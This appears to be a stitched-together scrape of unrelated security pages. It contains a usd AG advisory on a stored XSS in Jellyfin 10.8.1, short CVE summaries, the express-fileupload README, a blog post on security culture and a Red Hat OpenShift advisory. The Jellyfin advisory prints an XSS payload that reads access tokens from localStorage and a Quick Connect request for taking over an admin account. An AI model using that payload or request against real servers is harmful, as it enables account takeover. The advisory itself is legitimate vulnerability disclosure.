In Jellyfin 10.8.x through 10.8.3, the name of a collection is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.

**usd-2022-0031 | Jellyfin 10.8.1 - Cross-Site Scripting**

**Advisory ID:** usd-2022-0031  
**Product:** Jellyfin  
**Affected Version:** 10.8.1  
**Vulnerability Type:** CWE-79  
**Security Risk:** Critical  
**Vendor URL:** https://jellyfin.org  
**Vendor Status:** fixed  
**CVE number:** CVE-2023-23635

**Description**

A stored XSS in Jellyfin 10.8.1 allows an remote attacker to inject JavaScript into the name of a collection to perform a Cross-Site Scripting (XSS) attack.  
Because session tokens are stored in the localStorage, the attacker can extract them via javascript.

**Proof of Concept**

The following screenshot shows how an attacker can create a malicious collection.

  
The injected JavaScript code is executed in the user's browser, if a user (e.g. admin) visits the _collections_ page.

  
If you want to do some more interesting stuff with this vulnerability like taking over the admin account, you can use the following payload to read the access tokens from the localStorage.

"><img src=/X onerror=alert(localStorage.getItem("jellyfin\_credentials"))>

Getting the access token and device id allows you to rebuild the request for the _Quick Connect_ Feature.

This feature allows users to login using a PIN. The following request sets a PIN.

POST /QuickConnect/Authorize?Code=111111 HTTP/1.1  
Host: localhost:8096  
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Emby-Authorization: MediaBrowser Client="Jellyfin Web", Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0OyBydjoxMDAuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMDAuMHwxNjU2NzU0NTEwMjcz", Version="10.8.1", Token="7bd97aae0924484884d7d13a74e9517c"  
Origin: \[http://localhost:8096\]()  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Connection: close  
Cookie: sfcsrftoken=S82egH1Csl8FsxnMPQ6NGzXCWL3tiI8tNUvfsNyXnAVoGGthaUjsjrWesdhvu9Gc  
Content-Length: 0

**Fix**

It is recommended to treat all input on the website as potentially dangerous.  
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.  
The majority of programming languages support standard procedures for encoding meta characters.

**References**

*   https://owasp.org/www-community/attacks/xss/
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23635 

**Timeline**

*   **2022-07-18**: First contact request via security@jellyfin.org
*   **2022-08-02**: Vulnerability details submitted
*   **2022-08-16**: Fixed by Vendor
*   **2023-01-16:** Requested CVE assigned
*   **2023-01-19**: The advisory is published

**Credits**

This security vulnerability was found by Christian Pöschl of usd AG.

CVE-2023-23635: Security Advisory usd- 2022-0031 | usd HeroLab

CVE-2021-1934

The Event Monster WordPress plugin before 1.2.0 does not have CSRF check when deleting visitors, which could allow attackers to make logged in admin delete arbitrary visitors via a CSRF attack

CVE-2022-3336

The Frontend File Manager Plugin WordPress plugin before 21.4 does not have CSRF check when uploading files, which could allow attackers to make logged in users upload files on their behalf

CVE-2022-3126

The systool_server in PAX Technology A930 PayDroid 7.1.1 Virgo V04.4.02 20211201 fails to check for dollar signs or backticks in user supplied commands, leading to to arbitrary command execution as root.

CVE-2022-26582

The Correos Oficial WordPress plugin through 1.2.0.2 does not have an authorization check user input validation when generating a file path, allowing unauthenticated attackers to download arbitrary files from the server.

CVE-2023-0331

The Tiempo.com WordPress plugin through 0.1.2 does not have CSRF check when deleting its shortcode, which could allow attackers to make logged in admins delete arbitrary shortcode via a CSRF attack

CVE-2023-2271

An arbitrary file write vulnerability in Express-FileUpload v1.3.1 allows attackers to upload multiple files with the same name, causing an overwrite of files in the web application server.

**express-fileupload**

Simple express middleware for uploading files.

![npm](https://camo.githubusercontent.com/6cdf6a999117214ddb2c9efa84c9675877635a5cb119e633c9c5853171c56627/68747470733a2f2f696d672e736869656c64732e696f2f6e706d2f762f657870726573732d66696c6575706c6f61642e737667) ![downloads per month](https://camo.githubusercontent.com/8adf05a4f289c0abf1e39815a6906d33e36b77ebe4e4b4ce93cfb7ef24105e97/687474703a2f2f696d672e736869656c64732e696f2f6e706d2f646d2f657870726573732d66696c6575706c6f61642e737667) ![CircleCI](https://camo.githubusercontent.com/730c1525f788534b709a8da897279e2a0cefc8499da1ba0ea1b649b17ffee569/68747470733a2f2f636972636c6563692e636f6d2f67682f726963686172646769726765732f657870726573732d66696c6575706c6f61642f747265652f6d61737465722e7376673f7374796c653d737667) ![Coverage Status](https://camo.githubusercontent.com/271bc75f097ec338cdfc427c163268f226dfab6792c9f3b923ece75d2fd783c2/68747470733a2f2f696d672e736869656c64732e696f2f636f766572616c6c732f726963686172646769726765732f657870726573732d66696c6575706c6f61642e737667)

**Security Notice**

Please install version 1.1.10+ of this package to avoid a security vulnerability in Node/EJS related to JS prototype pollution. This vulnerability is only applicable if you have the `parseNested` option set to `true` (it is `false` by default).

**Install**

# With NPM
npm i express-fileupload

# With Yarn
yarn add express-fileupload

**Usage**

When you upload a file, the file will be accessible from `req.files`.

Example:

*   You're uploading a file called **car.jpg**
*   Your input's name field is **foo**: `<input name="foo" type="file" />`
*   In your express server request, you can access your uploaded file from `req.files.foo`:

app.post('/upload', function(req, res) {
  console.log(req.files.foo); // the uploaded file object
});

The **req.files.foo** object will contain the following:

*   `req.files.foo.name`: "car.jpg"
*   `req.files.foo.mv`: A function to move the file elsewhere on your server. Can take a callback or return a promise.
*   `req.files.foo.mimetype`: The mimetype of your file
*   `req.files.foo.data`: A buffer representation of your file, returns empty buffer in case useTempFiles option was set to true.
*   `req.files.foo.tempFilePath`: A path to the temporary file in case useTempFiles option was set to true.
*   `req.files.foo.truncated`: A boolean that represents if the file is over the size limit
*   `req.files.foo.size`: Uploaded size in bytes
*   `req.files.foo.md5`: MD5 checksum of the uploaded file

**Notes about breaking changes with MD5 handling:**

*   Before 1.0.0, `md5` is an MD5 checksum of the uploaded file.
*   From 1.0.0 until 1.1.1, `md5` is a function to compute an MD5 hash (Read about it here.).
*   From 1.1.1 onward, `md5` is reverted back to MD5 checksum value and also added full MD5 support in case you are using temporary files.

**Examples**

*   Example Project
*   Basic File Upload
*   Multi-File Upload

**Using Busboy Options**

Pass in Busboy options directly to the express-fileupload middleware. Check out the Busboy documentation here.

app.use(fileUpload({
  limits: { fileSize: 50 \* 1024 \* 1024 },
}));

**Using useTempFile Options**

Use temp files instead of memory for managing the upload process.

// Note that this option available for versions 1.0.0 and newer. 
app.use(fileUpload({
    useTempFiles : true,
    tempFileDir : '/tmp/'
}));

**Using debug option**

You can set `debug` option to `true` to see some logging about upload process. In this case middleware uses `console.log` and adds `Express-file-upload` prefix for outputs.

It will show you whether the request is invalid and also common events triggered during upload. That can be really useful for troubleshooting and _**we recommend attaching debug output to each issue on Github**_.

_**Output example:**_

    Express-file-upload: Temporary file path is /node/express-fileupload/test/temp/tmp-16-1570084843942
    Express-file-upload: New upload started testFile->car.png, bytes:0
    Express-file-upload: Uploading testFile->car.png, bytes:21232...
    Express-file-upload: Uploading testFile->car.png, bytes:86768...
    Express-file-upload: Upload timeout testFile->car.png, bytes:86768
    Express-file-upload: Cleaning up temporary file /node/express-fileupload/test/temp/tmp-16-1570084843942...
    

_**Description:**_

*   `Temporary file path is...` says that `useTempfiles` was set to true and also shows you temp file name and path.
*   `New upload started testFile->car.png` says that new upload started with field `testFile` and file name `car.png`.
*   `Uploading testFile->car.png, bytes:21232...` shows current progress for each new data chunk.
*   `Upload timeout` means that no data came during `uploadTimeout`.
*   `Cleaning up temporary file` Here finaly we see cleaning up of the temporary file because of upload timeout reached.

**Available Options**

Pass in non-Busboy options directly to the middleware. These are express-fileupload specific options.

Option

Acceptable Values

Details

createParentPath

*   `false` **(default)**
*   `true`

Automatically creates the directory path specified in `.mv(filePathName)`

uriDecodeFileNames

*   `false` **(default)**
*   `true`

Applies uri decoding to file names if set true.

safeFileNames

*   `false` **(default)**
*   `true`
*   regex

Strips characters from the upload's filename. You can use custom regex to determine what to strip. If set to `true`, non-alphanumeric characters _except_ dashes and underscores will be stripped. This option is off by default.

**Example #1 (strip slashes from file names):** `app.use(fileUpload({ safeFileNames: /\\/g }))`  
**Example #2:** `app.use(fileUpload({ safeFileNames: true }))`

preserveExtension

*   `false` **(default)**
*   `true`
*   `_Number_`

Preserves filename extension when using `safeFileNames` option. If set to `true`, will default to an extension length of 3. If set to `_Number_`, this will be the max allowable extension length. If an extension is smaller than the extension length, it remains untouched. If the extension is longer, it is shifted.

**Example #1 (true):**  
`app.use(fileUpload({ safeFileNames: true, preserveExtension: true }));`  
_myFileName.ext_ --> _myFileName.ext_

**Example #2 (max extension length 2, extension shifted):**  
`app.use(fileUpload({ safeFileNames: true, preserveExtension: 2 }));`  
_myFileName.ext_ --> _myFileNamee.xt_

abortOnLimit

*   `false` **(default)**
*   `true`

Returns a HTTP 413 when the file is bigger than the size limit if true. Otherwise, it will add a `truncated = true` to the resulting file structure.

responseOnLimit

*   `'File size limit has been reached'` **(default)**
*   `_String_`

Response which will be send to client if file size limit exceeded when abortOnLimit set to true.

limitHandler

*   `false` **(default)**
*   `function(req, res, next)`

User defined limit handler which will be invoked if the file is bigger than configured limits.

useTempFiles

*   `false` **(default)**
*   `true`

By default this module uploads files into RAM. Setting this option to True turns on using temporary files instead of utilising RAM. This avoids memory overflow issues when uploading large files or in case of uploading lots of files at same time.

tempFileDir

*   `String` **(path)**

Path to store temporary files.  
Used along with the `useTempFiles` option. By default this module uses 'tmp' folder in the current working directory.  
You can use trailing slash, but it is not necessary.

parseNested

*   `false` **(default)**
*   `true`

By default, req.body and req.files are flattened like this: `{'name': 'John', 'hobbies[0]': 'Cinema', 'hobbies[1]': 'Bike'}`

When this option is enabled they are parsed in order to be nested like this: `{'name': 'John', 'hobbies': ['Cinema', 'Bike']}`

debug

*   `false` **(default)**
*   `true`

Turn on/off upload process logging. Can be useful for troubleshooting.

uploadTimeout

*   `60000` **(default)**
*   `Integer`

This defines how long to wait for data before aborting. Set to 0 if you want to turn off timeout checks.

**Help Wanted**

Looking for additional maintainers. Please contact `richardgirges [ at ] gmail.com` if you're interested. Pull Requests are welcome!

**Thanks & Credit**

Brian White for his stellar work on the Busboy Package and the connect-busboy Package

CVE-2022-27261: express-fileupload

Building a culture of cybersecurity is achievable by acknowledging its importance and consistently reinforcing that message.

Highly experienced information security team in place? Check.

Leading endpoint detection software and monitoring in place? Check.

Multifactor authentication enabled on all environment entry points? Check.

By all accounts, cutting-edge technology and skilled cybersecurity resources should be the end of the story for ensuring network integrity, right? If only it were that simple. With a recent survey indicating that 74% of cyber incidents include a human component to enable a threat actor, a company must do more to ensure a culture of cybersecurity and to protect its organization. 

So what does _more_ look like?

**A More Secure Organization**

More starts with understanding there is _always_ a cybersecurity risk and ultimately ends with an established culture across all levels of the organization committed to collectively mitigating that risk. Let's  run through a few approaches that can help establish that culture and, thus, a more secure organization.

*   **It starts at the top:** Building a culture from the top down is not a new concept, but its relevance to cybersecurity within organizations is gaining the traction it deserves. At a base level, in order to simply have the technical applications and experienced personnel in place to adequately protect an organization, you need the individuals with the purse strings to be onboard. The sell likely has become easier over the past several years as incidents are in the news, the visibility grows, and those in the C-suite see similarly situated organizations fall victim to cyberattacks. At the end of the day, the message needs to be loud and clear from an organization's leadership that: a) we understand and appreciate the evolving cybersecurity risk to our company; and b) we are willing to invest in the security of our environment (both from technical and non-technical standpoints) to protect our business.
*   **Demonstrate that cybersecurity matters:** It might seem like we're asking a lot of an organization's leadership when it comes to creating a culture of cybersecurity, and that might be true. But building a culture of any kind within an organization begins with leadership embracing an idea and then continuing to acknowledge and engage on the topic. In this context, it means making cybersecurity part of the lexicon of an organization and finding the right opportunities to continuously demonstrate its importance to the company. How an organization decides to do this might depend on how it communicates with its workforce generally on other important topics, but some simple options include: 1) Regularly re-engaging on the topics of cybersecurity via an email newsletter from the chief information security officer (CISO) — highlighting not just what the company is doing on the technical side, but what challenges all organizations are facing related to evolving threats (e.g., AI) and the CISO's take on how every employee can help; and 2) Discussing cybersecurity on CEO- or COO-led companywide calls and emphasizing the importance of a strong cybersecurity culture to the longevity and success of the business. The more leadership discusses the importance of a culture of cybersecurity, the more employees will acknowledge that risk and ultimately accept a level of responsibility for the organization's cybersecurity safety.
*   **Educate (and then test and test again):** Ben Franklin once said, "An investment in knowledge pays the best interest," and when the average cost of an incident globally is in excess of $4 million, that certainly rings true when it comes to cybersecurity. There can be no doubt, the investment in educating and building an employee base knowledgeable about cybersecurity has _real_ economic value to an organization. This training allows employees to act as the last line of defense against a range of cyber threats, but perhaps equally as important, it empowers every employee to be a cybersecurity advocate for the organization, reminding their colleagues the importance of vigilance in support of a culture of cybersecurity. So how do you educate your employees? It starts with implementing a robust cybersecurity training program (hopefully something both educational and fun) and it continues by keeping your employees on their toes — using test phishing emails (and even text messages). The training and testing are then followed up with subsequent "re-training," if needed, to keep cybersecurity top of mind. Organizations can then share the outcomes of these test phishing emails with all employees (on standing calls or in their CISO newsletter) to take advantage of another key opportunity to speak to and re-enforce the importance of cybersecurity with real data and then share ways to help everyone do better.

At the end of the day, building a culture of cybersecurity is achievable by acknowledging its importance and consistently reinforcing that message. The goal is to have people thinking and talking about cybersecurity as part of their normal course of business and not simply in the context of "another training" or as something completely divorced from their role. When you find your teams are having a conversation about the latest phishing test email (for a free Thanksgiving turkey) or a recent cyber event impacting a competitor, you are witnessing the true reflection of a successful culture of cybersecurity. You should take a moment to applaud your team's success, and then, of course, plan for how to keep it going.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

The Need for a Cybersecurity-Centric Business Culture

Red Hat Security Advisory 2023-0774-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.28. Issues addressed include denial of service and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.11.28 security update  
Advisory ID:       RHSA-2023:0774-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0774  
Issue date:        2023-02-21  
CVE Names:         CVE-2021-4238 CVE-2021-38561 CVE-2022-2879  
                   CVE-2022-2880 CVE-2022-4337 CVE-2022-4338  
                   CVE-2022-23521 CVE-2022-41715 CVE-2022-41717  
                   CVE-2022-41903  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.11.28 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.11.28. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHBA-2023:0773

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

Security Fix(es):

* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as  
random as they should be (CVE-2021-4238)

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
(CVE-2021-38561)

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You can download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
can be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:85238bc3eddb88e958535597dbe8ec6f2aa88aa1713c2e1ee7faf88d1fefdac0

(For s390x architecture)  
The image digest is  
sha256:96528500690870b001c214ed0b142b5b375494ddfd99de274285ae6eacd318bb

(For ppc64le architecture)  
The image digest is  
sha256:0821035d379a4cab1147669bac5f42139b9839e780394e8586e29800e79789bd

(For aarch64 architecture)  
The image digest is  
sha256:a5c6196590d47b5ca8578e35c23da47cb103947271ab5deb21c8d258de62a777

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be  
2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-3942 - Whereabouts CNI timesout while iterating exclude range [backport 4.11]  
OCPBUGS-5245 - [release-4.11] OVNK: NAT issue for packets exceeding check_pkt_larger() for NodePort services that route to hostNetworked pods  
OCPBUGS-6492 - Inconsistent user expeience for creating new projects after persmissions have been revoked  
OCPBUGS-6851 - admin ack test nondeterministically does a check post-upgrade  
OCPBUGS-7010 - [release-4.11] Egress FW ACL rules are invalid in dualstack mode  
OCPBUGS-7319 - [4.11] [OVNK] Add support for service session affinity timeout  
OCPBUGS-7330 - When setting allowedRegistries urls the openshift-samples operator is degraded

6. References:

https://access.redhat.com/security/cve/CVE-2021-4238  
https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2022-2879  
https://access.redhat.com/security/cve/CVE-2022-2880  
https://access.redhat.com/security/cve/CVE-2022-4337  
https://access.redhat.com/security/cve/CVE-2022-4338  
https://access.redhat.com/security/cve/CVE-2022-23521  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-41903  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/VhwtzjgjWX9erEAQieJhAAnVRuofPrL8tBs08OpHo0Rj3ZzV/KbN/7  
27r8x4isOS52luUiYXbhOZVyhvD+CO0smH0XyDO4VKgSNq+3c9bn01ManYV0AG6L  
6iHWfYDaiQ3BUhjxblbAjjQb4NvwzOaMUZ+ZUBq7SwBSNDRSvcrZQbkzoNpOqAxd  
LyjaPOiPpinRp+rWO+TEX3/Lh9or4+Ga6LrqtXOWTqY8i/a0JDkX3RxB9I/0HkXa  
4pqyAXADc/Ms7tKjTH3+guLkzDJFyF0XNPYI1lIxNCrBA1raXCB1AZbbdqcMDV8n  
C6scF+X6jdSV4tSZ3xzHP1HCIMNHCoalMhBezpHIBO6thjZABCSM8zaoSi+GfnMc  
hwSYg/M2j9GqgpW1m6cu9HH/UWKkFyNbywtoJi/tF0rfCrcg3sppD9Id5VOUbwOI  
+kYycQIpmMdsFPW5ky87BGjzO3P+bd3W5hNWMUnecuDruZsItu/8XI/KWcFQhMEO  
il6GMPdSFdoCkqcv3QIMfEnDsfEgIhC7LASwcb1JaBvNIsoIuWu8zk7TJrqrNTgd  
nWGcfiUNOuNVaI1IyWRsd3/vZXSzO80PMbMckc7t1ONEbDka0siYGoN5WBrehZ7J  
XcRHqpKQbRgrDwUjL9l6gJ16CoiS3+OCHyl4yIS1yBGadKQZGOqQ7Y54Pfc16rU9  
j4PDiUFOyxc=DjOz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Search

lenovo warranty check/lookup | check warranty status | lenovo support us